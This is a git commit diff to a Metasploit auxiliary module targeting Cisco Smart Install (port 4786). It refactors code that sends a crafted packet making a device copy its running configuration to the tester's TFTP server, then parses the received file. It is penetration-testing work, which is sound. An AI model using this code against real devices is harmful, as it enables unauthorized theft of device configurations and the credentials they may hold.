Land #2 from jhart-r7/pr/fixup-9214

Austin · web-flow · commit 205ded85099c · 2017-11-21T21:22:23.000-05:00
diff --git a/modules/auxiliary/scanner/misc/cisco_smart_install.rb b/modules/auxiliary/scanner/misc/cisco_smart_install.rb
@@ -42,7 +42,8 @@ def initialize(info = {})
       [
         Opt::RPORT(4786),
         OptAddressLocal.new('LHOST', [ false, "The IP address of the system running this module" ]),
-        OptInt.new('SLEEP', [ true, "Time to wait for config to come back", 10])
+        OptInt.new('SLEEP', [ true, "Time to wait for config to come back", 10]),
+        OptString.new('CONFIG', [ true, "The source config to copy when using DOWNLOAD", "system:running-config" ])
       ]
     )
   end
@@ -81,8 +82,8 @@ def cleanup
       print_status("Providing some time for transfers to complete...")
       ::IO.select(nil, nil, nil, 5.0)
 
-      print_status("Shutting down the TFTP service...")
       if @tftp
+        print_status("Shutting down the TFTP service...")
         @tftp.close rescue nil
         @tftp = nil
       end
@@ -93,35 +94,33 @@ def cleanup
   # Callback for incoming files
   #
   def process_incoming(info)
-    @config_recieved = true
     return if not info[:file]
     name = info[:file][:name]
     data = info[:file][:data]
     from = info[:from]
-    return if not (name and data)
+    return if not (name && data && from)
 
     # Trim off IPv6 mapped IPv4 if necessary
     from = from[0].dup
     from.gsub!('::ffff:', '')
 
-    print_status("Incoming file from #{from} - #{name} #{data.length} bytes")
-    cisco_ios_config_eater(from, 4786, data)
+    print_status("Incoming file from #{from} - #{name} (#{data.length} bytes)")
+    cisco_ios_config_eater(from, rport, data)
   end
 
   def decode_hex(string)
     string.scan(/../).map { |x| x.hex }.pack('c*')
   end
 
-  def send_packet
-    copy_config = "copy system:running-config tftp://#{@lhost}/#{Rex::Text.rand_text_alpha(8)}"
+  def request_config(tftp_server, config)
+    copy_config = "copy #{config} tftp://#{tftp_server}/#{Rex::Text.rand_text_alpha(8)}"
     packet_header = '00000001000000010000000800000408000100140000000100000000fc99473786600000000303f4'
     packet = (decode_hex(packet_header) + copy_config + decode_hex(('00' * (336 - copy_config.length)))) + (decode_hex(('00' * (336)))) + (decode_hex(('00' * 336)))
-    print_status("Requesting configuration from device...")
+    print_status("Attempting #{copy_config}")
     sock.put(packet)
   end
 
   def run_host(ip)
-    @lhost    = datastore['LHOST'] || Rex::Socket.source_address(ip)
     begin
       case
         when action.name == 'SCAN'
@@ -133,8 +132,8 @@ def run_host(ip)
           return unless smi?
           disconnect # cant send any additional packets, so closing
           connect
-          print_status("Requesting configuration from device...")
-          send_packet
+          tftp_server = datastore['LHOST'] || Rex::Socket.source_address(ip)
+          request_config(tftp_server, datastore['CONFIG'])
           print_status("Waiting #{datastore['SLEEP']} seconds for configuration")
           Rex.sleep(datastore['SLEEP'])
       end
